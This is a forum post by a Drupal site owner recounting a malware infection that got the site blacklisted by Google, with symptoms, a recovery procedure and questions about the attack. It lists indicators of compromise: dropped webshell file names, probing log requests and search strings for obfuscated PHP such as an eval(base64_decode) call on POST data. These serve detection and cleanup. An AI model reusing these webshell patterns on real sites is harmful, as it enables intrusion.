Malware on D7 website - Blacklisted by Google

Hi to all,

I want to tell you about the malware attack to my Drupal website. Not just for your suggestions but also to create something helpful to anybody tha could suffer for the same problems. Well...

INITIAL SETUP

- Drupal 7.9
- Activated modules:
>>> CORE: Block, Contextual links, Database logging, Field, Field SQL storage, Field UI, File, Filter, Image, List, Locale, Menu, Node, Number, Options, Overlay, Path, PHP Filter, RDF, System, Taxonomy, Text, Toolbar, User
>>> CCK: Multiselectd
>>> CHAOS TOOL SUITE: Chaos tools
>>> DATA/ORA: Calendar, Date, Date API, Date Popup, Date views
>>> FIELDS: Email, Field permission, Link
>>> OTHER: Google Plus One +1, Pathauto, Token, Weight
>>> SHARING: Share this, Share this block
>>> TAXONOMY MENU: Taxonomy menu
>>> VIEWS: Views, Views PDF Display, Views PHP, Views UI
>>> OTHER MODULES THAT I REMOVED: CKEDITOR, VIEWS_SLIDESHOW, IMCE, DOMPDF, PRINT, WYSIWIG

MY SETUP ERRORS

- In order to satisfy the custome, I modified some of the modules and I've never update them (AUCH!)
- The customer was in posses of the login data, and maybe his computer wasn't safe (MMM...)
- I didn't have a copy of the webiste, because I trusted on the provider weekly backup (DOH!)

ATTACK EXTERNAL SYMPTOMS

- All the link of the homepage redirected to a malware website
- Google blacklisted the website
- Critical alert on the Google Webmaster Tools panel

FTP SYMPTOMS

- Lots of "strange" files: mainma3.php (I found this one in every folder!), functoins.php, sum75.html, wlc.html, aol.zip, chase.zip, chaseverification.zip, 501830549263.php, wp-conf.php and a dozen of wtmXXXXn.php (dove X = numero) in the root folder. All these files was plenty of malicious functions (unescape, base64_decode, eval, etc.)
- Install.php was modified with a long line of malicious code
- To EVERY javascript files was appended this line of code:
;document.write('');
- The weekly backup was also infeceted
- Dozen of repeated "strange" request, found on the Drupal log panel (my domain is obscured with the string "-----"):
>>> index.php?q=ckeditor/xss > Notice: Undefined offset: 5 in eval() (linea 29 di /web/htdocs/-----/home/modules/php/php.module(74) : eval()'d code(1) : eval()'d code).
>>> http://-----/user?destination=node/add > Failed login by shadowke
>>> calendar/week/2012-W19?year=2011&mini=2012-12 > page not found
>>> misc/]};P.optgroup=P.option;P.tbody=P.tfoot=P.colgroup=P.caption=P.thead;P.th=P.td;if(!c.support.htmlSerialize)P._default=[1, > page not found
>>> misc/)h.html(f?c( > page not found
>>> mail.htm > page not found

RECOVER [Thank to this article: http://25yearsofprogramming.com/blog/20070705.htm]

1) I've put the website on Maintanance mode (error503.php + .htaccess). Traffic open just for my IP Address
[see this useful guide: http://25yearsofprogramming.com/blog/20070704.htm]
2) I've downloaded the whole website in local
3) I've searched and removed the strange files > I found forty of them
4) I've searched the files for these worlds [with the freeware AGENT RANSACK]: eval(base64_decode($_POST["php"])), eval(, eval (, base64_, document.write, iframe, unescape, var div_colors, var _0x, CoreLibrariesHandler, pingnow, serchbot, km0ae9gr6m, c3284d, upd.php, *timthumb*. > I've acted in one of the follow ways: a) I've replaced eval with php_eval() (the eval safe version of drupal); b) I've wrote down the suspected modules; c) I've compared the code with the fresh downloaded module; d) I've removed all the malicious code (see the javascript mentioned above)
5) I've searched for mohanges in the file system [with the freeware WINMERGE]
6) I've identifyed some suspected modules, thank to the list written at the point 4 above, and thank to some researches on Google (name_of_the_module security issue, name_of_the_module hacked, etc...) and on Secunia [http://secunia.com/community/advisories/search]
7) I've scan my computer (Avast, Search&Destroy, Malwarebytes Antimalware) > I didn't found any virus or spyware
8) I've changed all the logins (ftp, cpanel, drupal admin panel)
9) I've reloaded the whole website
10) I've removed all the suspected modules: CKEDITOR, VIEWS_SLIDEWHOW, PRINT, DOMPDF, IMCE, CAPTCHA, WYSIWIG, WEBFORM.
11) I've tell the whole story to the provider assistance
12) I request Google for a revision (they did it in 12 hours)

DRUPAL LOG NOW

dozen of these messages:
>>> wtm4698n.php?showimg=1&cookies=1 > page not found
>>> fhd42i3d.html > page not found
>>> wp-conf.php?t2471n=1 > page not found
>>> http://-----/user?destination=node/add > Failed login by Elovogue

LESSONS LEARNED

- Never touch the modules, so you can update them
- Keep all the login in a safe computer / Use a safe computer to work on the FTP
- Search for any security issue before installing a module
- Keep a clean copy of the website somewhere

MY QUESTIONS:

- What kind of attack I've received?
- There are other unsure module in my installation?
- What can I do yet?

Thanks to everybody for your patience!